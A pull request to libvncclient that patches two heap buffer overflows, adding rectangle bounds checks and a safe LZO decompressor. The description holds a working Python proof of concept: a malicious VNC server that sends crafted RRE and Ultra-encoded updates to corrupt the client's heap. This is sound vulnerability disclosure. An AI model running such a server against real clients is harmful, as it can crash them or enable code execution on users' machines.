### PR TITLE
Fix two heap buffer overflows

### DIFF
--- a/libvncclient/rfbproto.c
+++ b/libvncclient/rfbproto.c
@@ -147,11 +147,20 @@ void* rfbClientGetClientData(rfbClient* client, void* tag)
 
 /* messages */
 
+static boolean CheckRect(rfbClient* client, int x, int y, int w, int h) {
+  return x + w <= client->width && y + h <= client->height;
+}
+
 static void FillRectangle(rfbClient* client, int x, int y, int w, int h, uint32_t colour) {
   int i,j;
 
   if (client->frameBuffer == NULL) {
       return;
+  }
+
+  if (!CheckRect(client, x, y, w, h)) {
+    rfbClientLog("Rect out of bounds: %dx%d at (%d, %d)\n", x, y, w, h);
+    return;
   }
 
 #define FILL_RECT(BPP) \
@@ -173,6 +182,11 @@ static void CopyRectangle(rfbClient* client, uint8_t* buffer, int x, int y, int 
 
   if (client->frameBuffer == NULL) {
       return;
+  }
+
+  if (!CheckRect(client, x, y, w, h)) {
+    rfbClientLog("Rect out of bounds: %dx%d at (%d, %d)\n", x, y, w, h);
+    return;
   }
 
 #define COPY_RECT(BPP) \
@@ -199,6 +213,16 @@ static void CopyRectangleFromRectangle(rfbClient* client, int src_x, int src_y, 
 
   if (client->frameBuffer == NULL) {
       return;
+  }
+
+  if (!CheckRect(client, src_x, src_y, w, h)) {
+    rfbClientLog("Source rect out of bounds: %dx%d at (%d, %d)\n", src_x, src_y, w, h);
+    return;
+  }
+
+  if (!CheckRect(client, dest_x, dest_y, w, h)) {
+    rfbClientLog("Dest rect out of bounds: %dx%d at (%d, %d)\n", dest_x, dest_y, w, h);
+    return;
   }
 
 #define COPY_RECT_FROM_RECT(BPP) \

--- a/libvncclient/ultra.c
+++ b/libvncclient/ultra.c
@@ -86,14 +86,14 @@ HandleUltraBPP (rfbClient* client, int rx, int ry, int rw, int rh)
 
   /* uncompress the data */
   uncompressedBytes = client->raw_buffer_size;
-  inflateResult = lzo1x_decompress(
+  inflateResult = lzo1x_decompress_safe(
               (lzo_byte *)client->ultra_buffer, toRead,
               (lzo_byte *)client->raw_buffer, (lzo_uintp) &uncompressedBytes,
               NULL);
   
-  
+  /* Note that uncompressedBytes will be 0 on output overrun */
   if ((rw * rh * (BPP / 8)) != uncompressedBytes)
-      rfbClientLog("Ultra decompressed too little (%d < %d)", (rw * rh * (BPP / 8)), uncompressedBytes);
+      rfbClientLog("Ultra decompressed unexpected amount of data (%d != %d)\n", (rw * rh * (BPP / 8)), uncompressedBytes);
   
   /* Put the uncompressed contents of the update on the screen. */
   if ( inflateResult == LZO_E_OK ) 
@@ -168,7 +168,7 @@ HandleUltraZipBPP (rfbClient* client, int rx, int ry, int rw, int rh)
 
   /* uncompress the data */
   uncompressedBytes = client->raw_buffer_size;
-  inflateResult = lzo1x_decompress(
+  inflateResult = lzo1x_decompress_safe(
               (lzo_byte *)client->ultra_buffer, toRead,
               (lzo_byte *)client->raw_buffer, &uncompressedBytes, NULL);
   if ( inflateResult != LZO_E_OK ) 


### PR DESCRIPTION
This PR fixes two unrelated buffer overflows, which can be used by a malicious server to overwrite parts of the heap and crash the client (or possibly execute arbitrary code). 

PoC (for `./client_examples/gtkvncviewer`):
```
#! /usr/bin/env python3

import asyncio
import struct
import lzo
import time

class EvilVNCProtocol(asyncio.Protocol):

    def connection_made(self, transport):
        self.transport = transport
        # Note that we just ignore whatever the client says
        self.transport.write(b"RFB 003.008\n")
        # Send supported security types (1 - None)
        self.transport.write(b"\x01\x01")
        # Confirm that authentication succeeded
        self.transport.write(b"\x00\x00\x00\x00")
        # Send ServerInit
        self.transport.write(
            struct.pack(">HHBBBBHHHBBBBBBIB",
                        100, 100, # Framebuffer width and height
                        32, # Bits per pixel
                        8, # Color depth
                        1, # Big endian
                        1, # True Color
                        255, 255, 255, # Color max values
                        0, 8, 16, # Color shifts
                        0, 0, 0, # Padding
                        1, # Name length
                        ord("E") # Name
            )
        )
        # For some reason, not waiting here led to the client occasionally
        # dropping the rest of the input buffer
        time.sleep(0.2)
        # Send evil FramebufferUpdate
        self.send_copyrect_crash()
        #self.send_ultra_lzo_crash()

    def send_copyrect_crash(self):
        self.transport.write(
            struct.pack(">BBHHHHHi",
                        0, 0, # message-type and padding
                        1, # number-of-rectangles
                        10, 0, # x and y positions
                        10, 10, # Width and height
                        2, # encoding = RRE
            )
        )
        self.transport.write(
            struct.pack(">IIIHHHH",
                        1, # nSubrects
                        0x41414141, # Background pixel value
                        0x42424242, # Rect pixel value
                        10, 10000, 1, 1 # x, y, w, h
            )
        )

    def send_ultra_lzo_crash(self):
        self.transport.write(
            struct.pack(">BBHHHHHi",
                        0, 0, # message-type and padding
                        1, # number-of-rectangles
                        10, 0, # x and y positions
                        10, 10, # Width and height
                        9, # encoding = Ultra
            )
        )
        data = lzo.compress(b"A" * 10000)
        self.transport.write(
            struct.pack(">I",
                        len(data)
            )
        )
        self.transport.write(data)

    def data_received(self, data):
        print(data)


loop = asyncio.get_event_loop()
coro = loop.create_server(EvilVNCProtocol, "0.0.0.0", 5900)
server = loop.run_until_complete(coro)

loop.run_forever()
```